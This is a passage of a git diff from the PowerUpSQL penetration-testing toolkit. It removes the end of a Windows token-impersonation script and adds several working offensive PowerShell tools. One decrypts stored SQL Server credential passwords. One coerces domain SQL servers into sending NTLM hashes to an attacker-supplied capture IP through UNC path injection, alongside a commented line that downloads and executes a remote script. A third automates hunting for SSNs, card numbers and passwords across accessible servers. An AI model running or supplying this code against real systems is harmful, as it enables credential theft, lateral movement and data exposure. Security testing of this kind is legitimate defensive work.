pipeline - if ($PassThru) { - #Retrieving created System.Diagnostics.Process object - $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId - - #Caching process handle so we don't lose it when the process exits - $null = $returnProcess.Handle - - #Passing System.Diagnostics.Process object to pipeline - $returnProcess - } - } - else - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "$FunctionName failed. Error code: $ErrorCode" - } - - #Free StartupInfo memory and ProcessInfo memory - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr) - $StartupInfoPtr = [Intptr]::Zero - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr) - $ProcessInfoPtr = [IntPtr]::Zero - [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr) - $ProcessNamePtr = [IntPtr]::Zero - - #Close handle for the token duplicated with DuplicateTokenEx - $Success = $CloseHandle.Invoke($NewHToken) - $NewHToken = [IntPtr]::Zero - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" - } - } - } - - - function Free-AllTokens - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [PSObject[]] - $TokenInfoObjs - ) - - foreach ($Obj in $TokenInfoObjs) - { - $Success = $CloseHandle.Invoke($Obj.hToken) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Verbose "Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode" - } - $Obj.hToken = [IntPtr]::Zero - } - } - - - #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token. - function Enum-AllTokens - { - $AllTokens = @() - - #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. - #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. - #We need to enumrate all processes running as SYSTEM and find one that we can use. - [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value - $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq $LocalSystemNTAccount} - ForEach ($SystemToken in $SystemTokens) - { - $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue - } - if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) - { - Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" - } - - if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero) - { - $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null - $systemTokenInfo = $null - } - - $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name -inotmatch "^system$" -and $_.id -ne 0} - - #Get all tokens - foreach ($Process in $ProcessIds) - { - $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs) - - #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it. - if ($PrimaryTokenInfo -ne $null) - { - [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken - - if ($hToken -ne [IntPtr]::Zero) - { - #Get the LUID corrosponding to the logon - $ReturnObj = Get-TokenInformation -hToken $hToken - if ($ReturnObj -ne $null) - { - $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id - - $AllTokens += $ReturnObj - } - } - else - { - Write-Warning "Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)" - } - - foreach ($Thread in $Process.Threads) - { - $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id - [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken) - - if ($hToken -ne [IntPtr]::Zero) - { - $ReturnObj = Get-TokenInformation -hToken $hToken - if ($ReturnObj -ne $null) - { - $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id - - $AllTokens += $ReturnObj - } - } - } - } - } - - return $AllTokens - } - - - function Invoke-RevertToSelf - { - Param( - [Parameter(Position=0)] - [Switch] - $ShowOutput - ) - - $Success = $RevertToSelf.Invoke() - - if ($ShowOutput) - { - if ($Success) - { - Write-Output "RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" - } - else - { - Write-Output "RevertToSelf failed. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" - } - } - } - - - #Main function - function Main - { - if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) - { - Write-Error "Script must be run as administrator" -ErrorAction Stop - } - - #If running in session 0, force NoUI - if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) - { - Write-Verbose "Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)" - $NoUI = $true - } - - if ($PsCmdlet.ParameterSetName -ieq "RevToSelf") - { - Invoke-RevertToSelf -ShowOutput - } - elseif ($PsCmdlet.ParameterSetName -ieq "CreateProcess" -or $PsCmdlet.ParameterSetName -ieq "ImpersonateUser") - { - $AllTokens = Enum-AllTokens - - #Select the token to use - [IntPtr]$hToken = [IntPtr]::Zero - $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser - if ($Username -ne $null -and $Username -ne '') - { - if ($UniqueTokens.ContainsKey($Username)) - { - $hToken = $UniqueTokens[$Username].hToken - Write-Verbose "Selecting token by username" - } - else - { - Write-Error "A token belonging to the specified username was not found. Username: $($Username)" -ErrorAction Stop - } - } - elseif ( $ProcessId -ne $null -and $ProcessId -ne 0) - { - foreach ($Token in $AllTokens) - { - if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId) - { - $hToken = $Token.hToken - Write-Verbose "Selecting token by ProcessID" - } - } - - if ($hToken -eq [IntPtr]::Zero) - { - Write-Error "A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop - } - } - elseif ($ThreadId -ne $null -and $ThreadId -ne 0) - { - foreach ($Token in $AllTokens) - { - if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId) - { - $hToken = $Token.hToken - Write-Verbose "Selecting token by ThreadId" - } - } - - if ($hToken -eq [IntPtr]::Zero) - { - Write-Error "A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened." -ErrorAction Stop - } - } - elseif ($Process -ne $null) - { - foreach ($Token in $AllTokens) - { - if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id) - { - $hToken = $Token.hToken - Write-Verbose "Selecting token by Process object" - } - } - - if ($hToken -eq [IntPtr]::Zero) - { - Write-Error "A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop - } - } - else - { - Write-Error "Must supply a Username, ProcessId, ThreadId, or Process object" -ErrorAction Stop - } - - #Use the token for the selected action - if ($PsCmdlet.ParameterSetName -ieq "CreateProcess") - { - if (-not $NoUI) - { - Set-DesktopACLs - } - - Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru - - Invoke-RevertToSelf - } - elseif ($ImpersonateUser) - { - Invoke-ImpersonateUser -hToken $hToken | Out-Null - Write-Output "Running As: $([Environment]::UserDomainName)\$([Environment]::UserName)" - } - - Free-AllTokens -TokenInfoObjs $AllTokens - } - elseif ($PsCmdlet.ParameterSetName -ieq "WhoAmI") - { - Write-Output "$([Environment]::UserDomainName)\$([Environment]::UserName)" - } - else #Enumerate tokens - { - $AllTokens = Enum-AllTokens - - if ($PsCmdlet.ParameterSetName -ieq "ShowAll") - { - Write-Output $AllTokens - } - else - { - Write-Output (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values - } - - Invoke-RevertToSelf - - Free-AllTokens -TokenInfoObjs $AllTokens - } - } - - - #Start the main function - Main -} diff --git a/scripts/PowerUpSQL-Logo.png b/scripts/PowerUpSQL-Logo.png deleted file mode 100644 index 95ce3fd..0000000 Binary files a/scripts/PowerUpSQL-Logo.png and /dev/null differ diff --git a/scripts/PowerUpSQL-LogoSm.png b/scripts/PowerUpSQL-LogoSm.png deleted file mode 100644 index c5cb73a..0000000 Binary files a/scripts/PowerUpSQL-LogoSm.png and /dev/null differ diff --git a/scripts/README.md b/scripts/README.md index 468c6d5..0523a72 100644 --- a/scripts/README.md +++ b/scripts/README.md @@ -1,22 +1,23 @@ -### 3rd Party Scripts +### Pending Scripts +The scripts in the pending directory are stand alone scripts that will eventually be turned into PowerUpSQL functions. -This folder contains scripts written by other authors which are used by some of the PowerUpSQL functions. Summary below. +### 3rd Party Functions +PowerUpSQL uses some 3rd party functions written by other authors. Those authors and functions are listed below. - Author: Warren F. (RamblingCookieMonster) - Source: https://github.com/RamblingCookieMonster/Invoke-Parallel - Imported Scripts: Invoke-Parallel.ps1 - PowerUpSQL Functions: Used for threaded functions. - - Author: Kevin Robertson - Source: https://github.com/Kevin-Robertson/Inveigh - Imported Scripts: Inveigh.ps1, Inveigh-BruteForce.ps1, and Inveigh-Relay.ps1 - PowerUpSQL Functions: Used in Invoke-SQLAuditPrivXpDirtree and Invoke-SQLAuditXpPrivFileExist - - Author: Joeseph Bailek - Source: https://github.com/clymb3r/PowerShell/tree/master/Invoke-TokenManipulation - Imported Scripts: Invoke-TokenManipulation.ps1 - PowerUpSQL Functions: Pending... - - +Author: Warren F. (RamblingCookieMonster)
+Source: https://github.com/RamblingCookieMonster/Invoke-Parallel
+Imported Scripts: Invoke-Parallel.ps1
+PowerUpSQL Functions: Used for threaded functions.
+Author: Kevin Robertson
+Source: https://github.com/Kevin-Robertson/Inveigh
+Imported Scripts: Inveigh.ps1, Inveigh-BruteForce.ps1, and Inveigh-Relay.ps1
+PowerUpSQL Functions: Used in Invoke-SQLAuditPrivXpDirtree and Invoke-SQLAuditXpPrivFileExist
+ +Author: Joe Bialek
+Source: https://github.com/clymb3r/PowerShell/tree/master/Invoke-TokenManipulation
+Imported Scripts: Invoke-TokenManipulation.ps1
+ +### Community Contributions
+Some PowerUpSQL functions have been written by other authors. Those authors are documented at the beginning of each function and noted in the primary readme file. If I missed someone please let me know! diff --git a/scripts/pending/Get-MSSQLCredentialPasswords.psm1 b/scripts/pending/Get-MSSQLCredentialPasswords.psm1 new file mode 100644 index 0000000..7a3f4d4 --- /dev/null +++ b/scripts/pending/Get-MSSQLCredentialPasswords.psm1 @@ -0,0 +1,137 @@ +function Get-MSSQLCredentialPasswords{ + + <# + .SYNOPSIS + Extract and decrypt MSSQL Credentials passwords. + + Author: Antti Rantasaari 2014, NetSPI + License: BSD 3-Clause + + .DESCRIPTION + Get-MSSQLCredentialPasswords extracts and decrypts the connection credentials for all saved Credentials. + + .INPUTS + None + + .OUTPUTS + System.Data.DataRow + + Returns a datatable consisting of MSSQL instance name, credential name, user account, and decrypted password. + + .EXAMPLE + C:\PS> Get-MSSQLCredentialPasswords + + Instance Credential User Password + -------- ---------- ---- -------- + SQLEXPRESS test test test + SQLEXPRESS user1 user1 Passw0rd01! + SQL2012 user2 user2 Passw0rd01! + SQL2012 VAULT user3 !@#Sup3rS3cr3tP4$$w0rd!!$$ + + .NOTES + For successful execution, the following configurations and privileges are needed: + - DAC connectivity to MSSQL instances + - Local administrator privileges (needed to access registry key) + - Sysadmin privileges to MSSQL instances + + .LINK + http://www.netspi.com/blog/ + #> + Add-Type -assembly System.Security + Add-Type -assembly System.Core + + # Set local computername and get all SQL Server instances + $ComputerName = $Env:computername + $SqlInstances = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server' -Name InstalledInstances).InstalledInstances + + $Results = New-Object "System.Data.DataTable" + $Results.Columns.Add("Instance") | Out-Null + $Results.Columns.Add("Credential") | Out-Null + $Results.Columns.Add("User") | Out-Null + $Results.Columns.Add("Password") | Out-Null + + foreach ($InstanceName in $SqlInstances) { + + # Start DAC connection to SQL Server + # Default instance MSSQLSERVER -> instance name cannot be used in connection string + if ($InstanceName -eq "MSSQLSERVER") { + $ConnString = "Server=ADMIN:$ComputerName\;Trusted_Connection=True" + } + else { + $ConnString = "Server=ADMIN:$ComputerName\$InstanceName;Trusted_Connection=True" + } + $Conn = New-Object System.Data.SqlClient.SQLConnection($ConnString); + + Try{$Conn.Open();} + Catch{ + Write-Error "Error creating DAC connection: $_.Exception.Message" + Continue + } + if ($Conn.State -eq "Open"){ + # Query Service Master Key from the database - remove padding from the key + # key_id 102 eq service master key, thumbprint 3 means encrypted with machinekey + $SqlCmd="SELECT substring(crypt_property,9,len(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)" + $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn); + $SmkBytes=$Cmd.ExecuteScalar() + + # Get entropy from the registry - hopefully finds the right SQL server instance + $RegPath = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\sql\").$InstanceName + [byte[]]$Entropy = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\$RegPath\Security\").Entropy + + # Decrypt the service master key + $ServiceKey = [System.Security.Cryptography.ProtectedData]::Unprotect($SmkBytes, $Entropy, 'LocalMachine') + + # Choose the encryption algorithm based on the SMK length - 3DES for 2008, AES for 2012 + # Choose IV length based on the algorithm + if (($ServiceKey.Length -eq 16) -or ($ServiceKey.Length -eq 32)) { + if ($ServiceKey.Length -eq 16) { + $Decryptor = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider + $IvLen=8 + } elseif ($ServiceKey.Length -eq 32){ + $Decryptor = New-Object System.Security.Cryptography.AESCryptoServiceProvider + $IvLen=16 + } + + # Query credential password information from the DB + # Remove header from imageval, extract IV (as iv) and ciphertext (as pass) + # Not sure what valclass and valnum mean, could not find documentation.. but valclass 28 with valnum 2 seems to store the encrypted password + + $SqlCmd = "SELECT name,credential_identity,substring(imageval,5,$ivlen) iv, substring(imageval,$($ivlen+5),len(imageval)-$($ivlen+4)) pass from sys.credentials cred inner join sys.sysobjvalues obj on cred.credential_id = obj.objid where valclass=28 and valnum=2" + + $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn); + $Data=$Cmd.ExecuteReader() + $Dt = New-Object "System.Data.DataTable" + $Dt.Load($Data) + + # Go through each row in results + foreach ($Logins in $Dt) { + + # decrypt the password using the service master key and the extracted IV + $Decryptor.Padding = "None" + $Decrypt = $Decryptor.CreateDecryptor($ServiceKey,$Logins.iv) + $Stream = New-Object System.IO.MemoryStream (,$Logins.pass) + $Crypto = New-Object System.Security.Cryptography.CryptoStream $Stream,$Decrypt,"Write" + + $Crypto.Write($Logins.pass,0,$Logins.pass.Length) + [byte[]]$Decrypted = $Stream.ToArray() + + # convert decrypted password to unicode + $EncodingType = "System.Text.UnicodeEncoding" + $Encode = New-Object $EncodingType + + # Print results - removing the weird padding (8 bytes in the front, some bytes at the end)... + # Might cause problems but so far seems to work.. may be dependant on SQL server version... + # If problems arise remove the next three lines.. + $i=8 + foreach ($b in $Decrypted) {if ($Decrypted[$i] -ne 0 -and $Decrypted[$i+1] -ne 0 -or $i -eq $Decrypted.Length) {$i -= 1; break;}; $i += 1;} + $Decrypted = $Decrypted[8..$i] + $Results.Rows.Add($InstanceName,$($Logins.name),$($Logins.credential_identity),$($Encode.GetString($Decrypted))) | Out-Null + } + } else { + Write-Error "Unknown key size" + } + $Conn.Close(); + } + } + $Results +} diff --git a/scripts/pending/Get-SQLCompactQuery.ps1 b/scripts/pending/Get-SQLCompactQuery.ps1 new file mode 100644 index 0000000..ddee58b --- /dev/null +++ b/scripts/pending/Get-SQLCompactQuery.ps1 @@ -0,0 +1,63 @@ +# Script: Get-SQLCompactQuery +# Pseudo Author: Scott Sutherland (@_nullbind), NetSPI 2016 +# This script is a slightly modified version of Jeremiah Clark's example code from the reference below. +# Reference: https://blogs.msdn.microsoft.com/miah/2011/08/08/powershell-and-sql-server-compact-4-0-a-happy-mix/ +# Reference: https://technet.microsoft.com/en-us/library/gg592946(v=sql.110).aspx +# Example: .\Get-SQLCompactQuery.ps1 -Query "SELECT TABLE_NAME from information_schema.tables" -DbFilePath c:\temp\file.sdf -Password SecretPassword! +# Example: .\Get-SQLCompactQuery.ps1 -Query "SELECT TABLE_NAME, COLUMN_NAME from information_schema.columns" -DbFilePath c:\temp\file.sdf -Password SecretPassword! + +[CmdletBinding()] +Param( + [Parameter(Mandatory=$false)] + [string]$LibFilePath, + + [Parameter(Mandatory=$true)] + [string]$DbFilePath, + + [Parameter(Mandatory=$false)] + [string]$Password, + + [Parameter(Mandatory=$false)] + [string]$Query = "SELECT TABLE_NAME, COLUMN_NAME from information_schema.columns" +) + +# Define lib path +if (-not $libpath){ + $libpath = "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v4.0\Desktop\System.Data.SqlServerCe.dll" +} + +# Import required library +[Reflection.Assembly]::LoadFile("$libpath") | Out-Null + +# Setup up password if provided +if($Password){ + $DbPass = ";Password=`"$Password`"" +}else{ + $DbPass = "" +} + +# Setup connection string +$connString = "Data Source=`"$DbFilePath`"$DbPass" +$cn = new-object "System.Data.SqlServerCe.SqlCeConnection" $connString + +# Create the command +$cmd = new-object "System.Data.SqlServerCe.SqlCeCommand" +$cmd.CommandType = [System.Data.CommandType]"Text" +$cmd.CommandText = "$Query" +$cmd.Connection = $cn + +# Create data table to store results +$dt = new-object System.Data.DataTable + +# Open connection +$cn.Open() + +# Run query +$rdr = $cmd.ExecuteReader() + +# Populate data table +$dt.Load($rdr) +$cn.Close() + +# Return data +$dt | Out-Default | Format-Table diff --git a/scripts/pending/Get-SQLServiceAccountPwHashes.ps1 b/scripts/pending/Get-SQLServiceAccountPwHashes.ps1 new file mode 100644 index 0000000..1e921f7 --- /dev/null +++ b/scripts/pending/Get-SQLServiceAccountPwHashes.ps1 @@ -0,0 +1,104 @@ +# author: scott sutherland (@_nullbind), NetSPI 2016 +# script name: Get-SQLServiceAccountPwHash.ps1 +# requirements: PowerUpSQL and Inveigh +# description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account. +# example: Get-SQLServiceAccountPwHashes -Verbose -CaptureIp 10.1.1.12 +# Note: alt domain user: runas /noprofile /netonly /user:domain\users powershell.exe + +Function Get-SQLServiceAccountPwHashes { + + [CmdletBinding()] + Param( + [Parameter(Mandatory=$false)] + [string]$Username, + + [Parameter(Mandatory=$false)] + [string]$Password, + + [Parameter(Mandatory=$false)] + [string]$DomainController, + + [Parameter(Mandatory=$true)] + [string]$CaptureIp, + + [Parameter(Mandatory=$false)] + [int]$TimeOut = 5 + ) + + Begin + { + # Attempt to load Inveigh via reflection - naturally this bombs if there is no outbound internet - just load it manually for the demo + # Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1') + + $TestIt = Test-Path -Path Function:\Invoke-Inveigh + if($TestIt -eq 'True') + { + Write-Verbose -Message "Inveigh loaded." + }else{ + Write-Verbose -Message "Inveigh NOT loaded." + return + } + } + + Process + { + # Discover SQL Servers on the Domain via LDAP queries for SPN records + Write-Verbose "Testings access to domain sql servers..." + $SQLServerInstances = Get-SQLInstanceDomain -verbose -CheckMgmt -DomainController $DomainController -Username $Username -Password $Password | Get-SQLConnectionTestThreaded -Verbose -Threads 15 + $SQLServerInstancesCount = $SQLServerInstances.count + Write-output "$SQLServerInstancesCount SQL Server instances found" + + # Get list of SQL Servers that the provided account can log into + $AccessibleSQLServers = $SQLServerInstances | ? {$_.status -eq "Accessible"} + $AccessibleSQLServersCount = $AccessibleSQLServers.count + + # Status user + Write-output "$AccessibleSQLServersCount SQL Server instances can be logged into" + Write-output "Attacking $AccessibleSQLServersCount accessible SQL Server instances..." + + # Start sniffing + Invoke-Inveigh -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue | Out-Null + + # Perform unc path injection on each one + $AccessibleSQLServers | + ForEach-Object{ + + # Get current instance + $CurrentInstance = $_.Instance + + # Start unc path injection for each interface + Write-Output "$CurrentInstance - Injecting UNC path to \\$CaptureIp\file" + + # Functions executable by the Public role that accept UNC paths + Get-SQLQuery -Instance $CurrentInstance -Query "xp_dirtree '\\$CaptureIp\file'" -SuppressVerbose | out-null + Get-SQLQuery -Instance $CurrentInstance -Query "xp_fileexist '\\$CaptureIp\file'" -SuppressVerbose | out-null + + # Sleep to give the SQL Server time to send us hashes :) + sleep $TimeOut + + # Get hashes + Write-Verbose "Captured password hashes:" + Get-InveighCleartext | Sort-Object + Get-InveighNTLMv1 | Sort-Object + Get-InveighNTLMv2 | Sort-Object + } + } + + End + { + # Return results + Write-Output "---------------------------------------" + Write-Output "Final List of Captured password hashes:" + Write-Output "---------------------------------------" + Get-InveighCleartext | Sort-Object + Get-InveighNTLMv1 | Sort-Object + Get-InveighNTLMv2 | Sort-Object + + # Stop sniffing + Stop-Inveigh | Out-Null + + # Clear cache + Clear-Inveigh | Out-Null + } +} + diff --git a/scripts/pending/Invoke-HuntSQLServers.ps1 b/scripts/pending/Invoke-HuntSQLServers.ps1 new file mode 100644 index 0000000..1262709 --- /dev/null +++ b/scripts/pending/Invoke-HuntSQLServers.ps1 @@ -0,0 +1,754 @@ +# ------------------------------------------ +# Function: Invoke-HuntSQLServers +# ------------------------------------------ +# Author: Scott Sutherland, NetSPI +# License: 3-clause BSD +# Version 1.2 +# Requires PowerUpSQL +function Invoke-HuntSQLServers +{ + <# + .SYNOPSIS + This function wraps around PowerUpSQL functions to inventory access to SQL Server instances associated with + Active Directory domains, and attempts to enumerate sensitive data. + .PARAMETER Username + Domain account to authenticate to Active Directory. + .PARAMETER Password + Domain password to authenticate to Active Directory. + .PARAMETER DomainController + Domain controller to authenticated to. Requires username/password or credential. + .PARAMETER Threads + Number of concurrent tasks to run at once. + .PARAMETER CheckMgmt + Perform SPN discovery of MSServerClusterMgmtAPI SPN as well. This is much slower. + .PARAMETER CheckAll + Attempt to log into all identify instances even if they dont respond to UDP requests. + .PARAMETER Output Directory + File path where all csv and html report will be exported. + .EXAMPLE + Run as current domain user on domain joined system. Only targets instances that respond to UDP scan. + PS C:\> Invoke-HuntSQLServers -OutputDirectory C:\temp\ + .EXAMPLE + Run as current domain user on domain joined system. Target all instances found during SPN discovery. + PS C:\> Invoke-HuntSQLServers -CheckAll -OutputDirectory C:\temp\ + .EXAMPLE + Run as current domain user on domain joined system. Target all instances found during SPN discovery. + Also, check for management servers that commonly have unregistered instances via additional UDP scan. + PS C:\> Invoke-HuntSQLServers -CheckAll -CheckMgmt -OutputDirectory C:\temp\ + .EXAMPLE + Run as alernative domain user against alertative domain: + PS C:\> runas /netonly /user domain\user powershell_ise.exe + PS C:\> import-module PowerUpSQL + PS C:\> Invoke-HuntSQLServers -CheckAll -OutputDirectory C:\temp\ -DomainController 192.168.1.1 -Username domain\user -Password MyPassword + .EXAMPLE + Full output example. + PS C:\> Invoke-HuntSQLServers -OutputDirectory C:\temp\ + + ---------------------------------------------------------------- + | Invoke-HuntSQLServers | + ---------------------------------------------------------------- + | | + | This function automates the following tasks: | + | | + | Instance Discovery | + | o Determine current computer's domain | + | o Query the domain controller via LDAP for SQL Server instances| + | o Filter for instances that respond to UDP scans | + | | + | Access Discovery | + | o Filter for instances that can be logged into | + | o Filter for instances that provide sysadmin access | + | o Identify potentially excessive role members (sysadmin) | + | o Identify shared SQL Server service accounts | + | o Summarize versions that could be logged into | + | | + | Data Target Discovery: Database Targets | + | o Filter based on database name | + | o Filter based on database encryption | + | | + | Data Target Discovery: Sensitive Data | + | o Social security numbers via column name | + | o Credit card numbers via column name | + | | + | Data Target Discovery: Passwords | + | o Passwords via column names | + | o Passwords in agent jobs (sysadmin) | + | o Passwords in stored procedures (sysadmin) | + | | + ---------------------------------------------------------------- + | Note: This can take hours to run in large environments. | + ---------------------------------------------------------------- + [*] Results will be written to C:\temp\test1 + [*] Start time: 09/30/2001 12:59:51 + [*] Verifying connectivity to the domain controller + [*] - Targeting domain domain.com + [*] - Confirmed connection to domain controller myfirstdc.domain.com + [*] ------------------------------------------------------------- + [*] INSTANCE DISCOVERY + [*] ------------------------------------------------------------- + [*] Querying LDAP for SQL Server SPNs (mssql*). + [*] - 100 SQL Server SPNs were found across 50 computers. + [*] - Writing list of SQL Server SPNs to C:\temp\domain.com-SQL-Server-Instance-SPNs.csv + [*] Performing UDP scanning 50 computers. + [*] - 50 instances responded. + [*] ------------------------------------------------------------- + [*] ACCESS DISCOVERY + [*] ------------------------------------------------------------- + [*] Attempting to log into 50 instances found via SPN query. + [*] - 25 could be logged into. + [*] Listing sysadmin access. + [*] - 2 SQL Server instances provided sysadmin privileges. + [*] Attempting to grab role members from 4 instances. + [*] - This usually requires special privileges + [*] - 5 role members were found. + [*] Identifying excessive role memberships. + [*] - 5 were found. + [*] Identifying shared SQL Server service accounts. + [*] - 6 shared accounts were found. + [*] Creating a list of accessible SQL Server instance versions. + [*] - 3 versions were found that could be logged into. + [*] ------------------------------------------------------------- + [*] DATABASE TARGET DISCOVERY + [*] ------------------------------------------------------------- + [*] Querying for all non-default accessible databases. + [*] - 10 accessible non-default databases were found. + [*] Filtering for databases using transparent encryption. + [*] - 2 databases were found using encryption. + [*] Filtering for databases with names that contain ACH. + [*] - 4 database names contain ACH. + [*] Filtering for databases with names that contain finance. + [*] - 1 database names contain finance. + [*] Filtering for databases with names that contain chd. + [*] - 6 database names contain chd. + [*] Filtering for databases with names that contain enclave. + [*] - 7 database names contain enclave. + [*] Filtering for databases with names that contain pos. + [*] - 2 database names contain pos. + [*] ------------------------------------------------------------- + [*] SENSITIVE DATA TARGET DISCOVERY + [*] ------------------------------------------------------------- + [*] Search accessible non-default databases for table names containing SSN. + [*] - 1 table columns found containing SSN. + [*] Search accessible non-default databases for table names containing CARD. + [*] - 7 table columns found containing CARD. + [*] Search accessible non-default databases for table names containing CREDIT. + [*] - 3 table columns found containing CREDIT. + [*] ------------------------------------------------------------- + [*] PASSWORD TARGET DISCOVERY + [*] ------------------------------------------------------------- + [*] Search accessible non-default databases for table names containing PASSWORD. + [*] - 4 table columns found containing PASSWORD. + [*] Search accessible non-default databases for agent source code containing PASSWORD. + [*] - 1 agent jobs containing PASSWORD. + [*] Search accessible non-default databases for stored procedure source code containing PASSWORD. + [*] - 0 stored procedures containing PASSWORD. + + ---------------------------------------------------------------- + SQL SERVER HUNT SUMMARY REPORT + ---------------------------------------------------------------- + Scan Summary + ---------------------------------------------------------------- + o Domain : DOMAIN.COM + o Start Time : 09/30/2001 12:59:51 + o Stop Time : 09/30/2001 13:00:17 + o Run Time : 00:00:25.7371541 + + ---------------------------------------------------------------- + Instance Summary + ---------------------------------------------------------------- + o 100 SQL Server instances found via SPN LDAP query. + o 50 SQL Server instances responded to port 1434 UDP requests. + + ---------------------------------------------------------------- + Access Summary + ---------------------------------------------------------------- + + Access: + o 25 SQL Server instances could be logged into. + o 5 SQL Server instances provided sysadmin access. + o 5 SQL Server role members were enumerated. *requires privileges + o 5 excessive role assignments were identified. + o 6 Shared SQL Server service accounts found. + + Below are the top 5: + o 10 SQLSVC_PROD + o 5 SQLSVC_UAT + o 5 SQLSVC_QA + o 2 SQLSVC_DEV + o 2 SQLApp + + Below is a summary of the versions for the accessible instances: + o 10 Standard Edition (64-bit) + o 5 Express Edition (64-bit) + o 10 Express Edition + + ---------------------------------------------------------------- + Database Summary + ---------------------------------------------------------------- + o 10 accessible non-default databases were found. + o 2 databases were found configured with transparent encryption. + o 4 database names contain ACH. + o 1 database names contain finance. + o 6 database names contain chd. + o 7 database names contain enclave. + o 2 database names contain pos. + + ---------------------------------------------------------------- + Sensitive Data Access Summary + ---------------------------------------------------------------- + o 1 sample rows were found for columns containing SSN. + o 7 sample rows were found for columns containing CREDIT. + o 3 sample rows were found for columns containing CARD. + + ---------------------------------------------------------------- + Password Access Summary + ---------------------------------------------------------------- + o 4 sample rows were found for columns containing PASSWRORD. + o 1 agent jobs potentially contain passwords. *requires sysadmin + o 0 stored procedures potentially contain passwords. *requires sysadmin + + ---------------------------------------------------------------- + [*] Saving results to C:\temp\demo.com-Share-Inventory-Summary-Report.html + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Domain user to authenticate with domain\user. For computer lookup.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain password to authenticate with domain\user. For computer lookup.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain controller for Domain and Site that you want to query against. For computer lookup.')] + [string]$DomainController, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads to process at once.')] + [int]$Threads = 100, + + [Parameter(Mandatory = $false, + HelpMessage = 'Perform SPN discovery of MSServerClusterMgmtAPI SPN as well. This is much slower.')] + [switch]$CheckMgmt, + + [Parameter(Mandatory = $false, + HelpMessage = 'Attempt to log into all identify instances even if they dont respond to UDP requests.')] + [switch]$CheckAll, + + [Parameter(Mandatory = $true, + HelpMessage = 'Directory to output files to.')] + [string]$OutputDirectory + ) + + Begin + { + Write-Output " ----------------------------------------------------------------" + Write-Output " | Invoke-HuntSQLServers |" + Write-Output " ----------------------------------------------------------------" + Write-Output " | |" + Write-Output " | This function automates the following tasks: |" + Write-Output " | |" + Write-Output " | Instance Discovery |" + Write-Output " | o Determine current computer's domain |" + 